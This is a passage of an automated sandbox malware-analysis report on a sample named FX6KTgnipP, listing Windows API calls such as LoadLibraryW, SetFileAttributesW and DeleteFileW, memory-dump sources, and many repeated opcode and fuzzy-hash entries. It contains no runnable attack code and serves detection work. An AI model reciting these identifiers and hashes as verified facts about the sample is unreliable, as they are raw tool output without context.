                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CreateFile$H_prolog3_
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1771569470-0
                                                                                                                                                                            • Opcode ID: 34cf33e351ac761e9aee045b012dd3ff126f572e274bfc2c0d007b4fee5381f0
                                                                                                                                                                            • Instruction ID: 9d7b5fe9c49a0f52b9c2fbac0a6291ffb3534aeb19cb9d2f9836479804fc68e5
                                                                                                                                                                            • Opcode Fuzzy Hash: 34cf33e351ac761e9aee045b012dd3ff126f572e274bfc2c0d007b4fee5381f0
                                                                                                                                                                            • Instruction Fuzzy Hash: 85417170920209DFDB28DFA4D88ABEEB7F4FB08320F10561EE456E7691D774A954CB24
                                                                                                                                                                            APIs
                                                                                                                                                                            • __EH_prolog3_GS.LIBCMT ref: 00256C65
                                                                                                                                                                            • GetSystemDirectoryW.KERNEL32(00000000,00000104), ref: 00256C9A
                                                                                                                                                                            • LoadLibraryW.KERNELBASE(00000000,?,?,00000000,00000000,?), ref: 00256D0C
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: DirectoryH_prolog3_LibraryLoadSystem
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1552931673-0
                                                                                                                                                                            • Opcode ID: eebc060c94dfaf5e3ed918050e1f250b75cac7f497ec073e318985d6fc612764
                                                                                                                                                                            • Instruction ID: 542af7778614710149b1d330bf1e7e304c4de7e7b0aa08a1d1cdb5adaed45024
                                                                                                                                                                            • Opcode Fuzzy Hash: eebc060c94dfaf5e3ed918050e1f250b75cac7f497ec073e318985d6fc612764
                                                                                                                                                                            • Instruction Fuzzy Hash: 71318D71D20258DBDB04DFE4C889BEEBBB8AF48315F10011EE505B7281DB745AA8CF65
                                                                                                                                                                            APIs
                                                                                                                                                                            • __EH_prolog3_GS.LIBCMT ref: 0024F592
                                                                                                                                                                            • SetFileAttributesW.KERNELBASE(?,?,00000024,0024A724,?,?,?,00000011,?,?,00000000,?,?,?,?,?), ref: 0024F5A8
                                                                                                                                                                            • SetFileAttributesW.KERNEL32(?,?,?,?,?,0024D303,?,?,?,?,?,?,?,6294DA82,00000049), ref: 0024F5EB
Memory Dump Source
• Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
• Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
Similarity
• API ID: AttributesFile$H_prolog3_
• String ID:
• API String ID: 2559025557-0
APIs
• __EH_prolog3_GS.LIBCMT ref: 0024EC6A
• DeleteFileW.KERNELBASE(?,00000024,0024D6F7,?), ref: 0024EC7D
• DeleteFileW.KERNEL32(00000000,?,00000000), ref: 0024ECBD
Similarity
• API ID: DeleteFile$H_prolog3_
• String ID:
• API String ID: 3558260747-0
APIs
• __EH_prolog3_GS.LIBCMT ref: 0024ED26
• GetFileAttributesW.KERNELBASE(?,00000024,0024ED16,00000000,0024A4A1,6294DA82,?,0024CDDD,?,?,?,?,?,?,?,?), ref: 0024ED39
• GetFileAttributesW.KERNELBASE(?,?,?), ref: 0024ED79
Similarity
• API ID: AttributesFile$H_prolog3_
• String ID:
• API String ID: 2559025557-0
APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 00264918
  • Part of subcall function 00264FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00265041
  • Part of subcall function 00264FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00265052
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID: I=uqI&
• API String ID: 1269201914-3646153225
                                                                                                                                                                            • Opcode Fuzzy Hash: 7612c2f4bb663aea95e59011475e4420c8e955df96d0362642782c7c2bac2b67
                                                                                                                                                                            • Instruction Fuzzy Hash: 93B012892BE100AD330471143D03C37010CC2C3B10330851AF844C2581D4819DF00131
APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 00264918
  • Part of subcall function 00264FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00265041
  • Part of subcall function 00264FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00265052
Strings
Memory Dump Source
• Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
• Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID: I=uqI&
• API String ID: 1269201914-3646153225
• Opcode ID: fd18a79ca6dce4f36831dfff2a034c356a0fe352d69302aee611f7bfa5e2099b
• Instruction ID: 61b881395ee391a010acac67f3223d3dae13fe90e234a97bc8ca780bca9b5f7b
• Opcode Fuzzy Hash: fd18a79ca6dce4f36831dfff2a034c356a0fe352d69302aee611f7bfa5e2099b
• Instruction Fuzzy Hash: FBB012852BE000AD330871143E03C37010CC2C2B10330851AF844C2581D4818EF90131
APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 00264918
  • Part of subcall function 00264FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00265041
  • Part of subcall function 00264FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00265052
Strings
Memory Dump Source
• Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
• Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID: I=uqI&
• API String ID: 1269201914-3646153225
• Opcode ID: a0cc1b32d81c2db5adc29641a79813e45567fb5fbe0ed7d316ed5b4b5c0db439
• Instruction ID: b1590c8dd79d85df62a5cd3ab172307bf088d66bbac6db5bd6a98beaebee559a
• Opcode Fuzzy Hash: a0cc1b32d81c2db5adc29641a79813e45567fb5fbe0ed7d316ed5b4b5c0db439
• Instruction Fuzzy Hash: A9B012892BE200AD374471143D03C37010CC2C2B10330461BF444C2581D4808DF00131
APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 00264918
  • Part of subcall function 00264FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00265041
  • Part of subcall function 00264FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00265052
Strings
Memory Dump Source
• Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
• Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID: I=uqI&
• API String ID: 1269201914-3646153225
• Opcode ID: 7ecdc373fffbab3faffb691044a6aa7495b724b28f1764254d35f23e55427aa8
• Instruction ID: b6d1b8b6c36bad849640399b7f46aeda9ddaf4acbbf1739f2e4edc16bdac08ef
• Opcode Fuzzy Hash: 7ecdc373fffbab3faffb691044a6aa7495b724b28f1764254d35f23e55427aa8
• Instruction Fuzzy Hash: 70B012892BE200AD330471143E03C37010CC2C2B10330451AF844C2581D4818FF10131
APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 00264918
  • Part of subcall function 00264FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00265041
  • Part of subcall function 00264FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00265052
Strings
Memory Dump Source
• Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
• Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID: I=uqI&
• API String ID: 1269201914-3646153225
• Opcode ID: d0383e0e5d57209e1f9be7f473bf5eb80990b0b4d9d78af743add12fea09017e
• Instruction ID: adb6655cbf7d0bf24db23c45cdf881ac2549ef32091c242127506315e306762a
• Opcode Fuzzy Hash: d0383e0e5d57209e1f9be7f473bf5eb80990b0b4d9d78af743add12fea09017e
• Instruction Fuzzy Hash: A8B012892BE100AD330471143D03C37010CC2C2B10330451AF444C2585D4808DF00231
APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 00264918
  • Part of subcall function 00264FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00265041
  • Part of subcall function 00264FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00265052
Strings
Memory Dump Source
• Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
• Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID: I=uqI&
• API String ID: 1269201914-3646153225
• Opcode ID: 109e0db79e98514d070315dc3adaf9233a44052d560cea5efc70c01dcd9cc353
• Instruction ID: d00938e05091fa1617d30c2e74810d2e4c3f516f8eb9409dd2de9f10b78f04fc
• Opcode Fuzzy Hash: 109e0db79e98514d070315dc3adaf9233a44052d560cea5efc70c01dcd9cc353
• Instruction Fuzzy Hash: 42B012952BE000AD330471143E03D37010CC2C2B10330452AF848C2481D4818FF10131
APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 00264918
  • Part of subcall function 00264FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00265041
  • Part of subcall function 00264FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00265052
Strings
Memory Dump Source
• Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
• Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID: I=uqI&
• API String ID: 1269201914-3646153225
• Opcode ID: 5f6f89f6835c2896381753017e32eb6d30defc8fc2db330462ebaed90206397a
• Instruction ID: 027fe3c1723f6cdfb4bea32305026b8c7dc07b983f39a0f0152e3aa8ff384d67
                                                                                                                                                                            • Opcode Fuzzy Hash: 5f6f89f6835c2896381753017e32eb6d30defc8fc2db330462ebaed90206397a
                                                                                                                                                                            • Instruction Fuzzy Hash: 2BB012852BF000AD370471143D03C37010DC2C3B10330851AF844C24C1D4808DF00131
APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 00264918
  • Part of subcall function 00264FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00265041
  • Part of subcall function 00264FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00265052
Strings
Memory Dump Source
• Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
• Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID: I=uqI&
• API String ID: 1269201914-3646153225
• Opcode ID: 47b91d55aa5368cf235e12027596a2e5aa2c5f859bf128c78b0452fc3b5f5361
• Instruction ID: 788cd035bb41b8d036d5b4d89a4e8dc0da36e6cbec8b33d12ae7f4e848f7360d
• Opcode Fuzzy Hash: 47b91d55aa5368cf235e12027596a2e5aa2c5f859bf128c78b0452fc3b5f5361
• Instruction Fuzzy Hash: 9FB012852BE000AD330871643D03C37010CC2C3B10330891AF444C2581D4808DF40131
APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 00264918
  • Part of subcall function 00264FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00265041
  • Part of subcall function 00264FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00265052
Strings
Memory Dump Source
• Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
• Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID: I=uqI&
• API String ID: 1269201914-3646153225
• Opcode ID: fed714a7785db3dfd1eb7c918c75a95cf2493d823c110c4910bba60c10047f2a
• Instruction ID: 76a74858d21e3417e5a7efdc7b95a305cd8eb37f76b88341a455da57374e6ab5
• Opcode Fuzzy Hash: fed714a7785db3dfd1eb7c918c75a95cf2493d823c110c4910bba60c10047f2a
• Instruction Fuzzy Hash: 48B012952BE000AD330471143D03D37010CC2C3B10330852AF848C2481D4808EF00131
APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 00264918
  • Part of subcall function 00264FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00265041
  • Part of subcall function 00264FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00265052
Strings
Memory Dump Source
• Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
• Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID: I=uqI&
• API String ID: 1269201914-3646153225
• Opcode ID: 4f03da55048aca63bff090ddef0c8c569ba713f7a2b1c2bcae3277ea452cfade
• Instruction ID: 470bc1936c420556fa3e6fd6d969e551e511b9247d5b7ccc06c8828db86b6cc3
• Opcode Fuzzy Hash: 4f03da55048aca63bff090ddef0c8c569ba713f7a2b1c2bcae3277ea452cfade
• Instruction Fuzzy Hash: EEB012952BE100AD334471143D03D37010CC2C2B50330462BF448C2481D4808EF00131
APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 00264918
  • Part of subcall function 00264FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00265041
  • Part of subcall function 00264FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00265052
Strings
Memory Dump Source
• Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
• Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID: I=uqI&
• API String ID: 1269201914-3646153225
• Opcode ID: d68bb173ac49a275534125d2b50874dd96859cc138f29dd6ce6bc96cd4e7fad3
• Instruction ID: 443332fa5ecdb178ddb29fd2f0c99100c435f4158115a039b1959e880005a949
• Opcode Fuzzy Hash: d68bb173ac49a275534125d2b50874dd96859cc138f29dd6ce6bc96cd4e7fad3
• Instruction Fuzzy Hash: 3DB012952BF100AD374472143D03C37010DC2C2B10330461BF444C2481D4808DF00131
APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 00264918
  • Part of subcall function 00264FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00265041
  • Part of subcall function 00264FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00265052
Strings
Memory Dump Source
• Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
• Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID: I=uqI&
• API String ID: 1269201914-3646153225
• Opcode ID: e0075fc7bf375cb84eb05bd82189106b1d5c7eed14479f29af2a9ec568cb12e5
• Instruction ID: 7b8e572272c1207d6ba2ca73f1155451c43d24f9d7923a97a10963d94a10d968
• Opcode Fuzzy Hash: e0075fc7bf375cb84eb05bd82189106b1d5c7eed14479f29af2a9ec568cb12e5
• Instruction Fuzzy Hash: 5CB012852BF000AD370471143D03C3B014EC6C2B10330451AF444C2481D4808DF00131
APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 00264918
  • Part of subcall function 00264FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00265041
  • Part of subcall function 00264FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00265052
Strings
Memory Dump Source
• Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
• Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID: I=uqI&
• API String ID: 1269201914-3646153225
• Opcode ID: e43fa8cec1b6ca2efc8f2dc44272bbc05a8dfca582c6d694ad5c82e1d3eafd72
• Instruction ID: 393535b9961bde7656ee15e1a2eb531220ea20ebcfdba5781a3435af4c74ae9a
                                                                                                                                                                            • Opcode Fuzzy Hash: e43fa8cec1b6ca2efc8f2dc44272bbc05a8dfca582c6d694ad5c82e1d3eafd72
                                                                                                                                                                            • Instruction Fuzzy Hash: 30B012852BE000AD330471143D03C37010CC2C3B10330891AF844C6481D4808DF00131
                                                                                                                                                                            APIs
                                                                                                                                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00264918
                                                                                                                                                                              • Part of subcall function 00264FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00265041
                                                                                                                                                                              • Part of subcall function 00264FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00265052
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                            • String ID: I=uqI&
                                                                                                                                                                            • API String ID: 1269201914-3646153225
                                                                                                                                                                            • Opcode ID: 97ee0c1d0f16a6cb2b66dbc0e99dab4527bed93569af4df19e391f84107fee7a
                                                                                                                                                                            • Instruction ID: 2ca98cb7b6b4c0dbf38014df072c1f56a9e4af637b971e3cbc2c2f53c56fd65e
                                                                                                                                                                            • Opcode Fuzzy Hash: 97ee0c1d0f16a6cb2b66dbc0e99dab4527bed93569af4df19e391f84107fee7a
                                                                                                                                                                            • Instruction Fuzzy Hash: 3EA0019A6BE112BC320872617E07C3B421DC6D6BA13318A1AF882C6886A8819AF51531
                                                                                                                                                                            APIs
                                                                                                                                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00264918
                                                                                                                                                                              • Part of subcall function 00264FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00265041
                                                                                                                                                                              • Part of subcall function 00264FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00265052
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                            • String ID: I=uqI&
                                                                                                                                                                            • API String ID: 1269201914-3646153225
                                                                                                                                                                            • Opcode ID: ee6491b701331c31c92654959974bebfe2dee5e683dc3bd43a51591106833346
                                                                                                                                                                            • Instruction ID: 2ca98cb7b6b4c0dbf38014df072c1f56a9e4af637b971e3cbc2c2f53c56fd65e
                                                                                                                                                                            • Opcode Fuzzy Hash: ee6491b701331c31c92654959974bebfe2dee5e683dc3bd43a51591106833346
                                                                                                                                                                            • Instruction Fuzzy Hash: 3EA0019A6BE112BC320872617E07C3B421DC6D6BA13318A1AF882C6886A8819AF51531
                                                                                                                                                                            APIs
                                                                                                                                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00264918
                                                                                                                                                                              • Part of subcall function 00264FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00265041
                                                                                                                                                                              • Part of subcall function 00264FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00265052
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
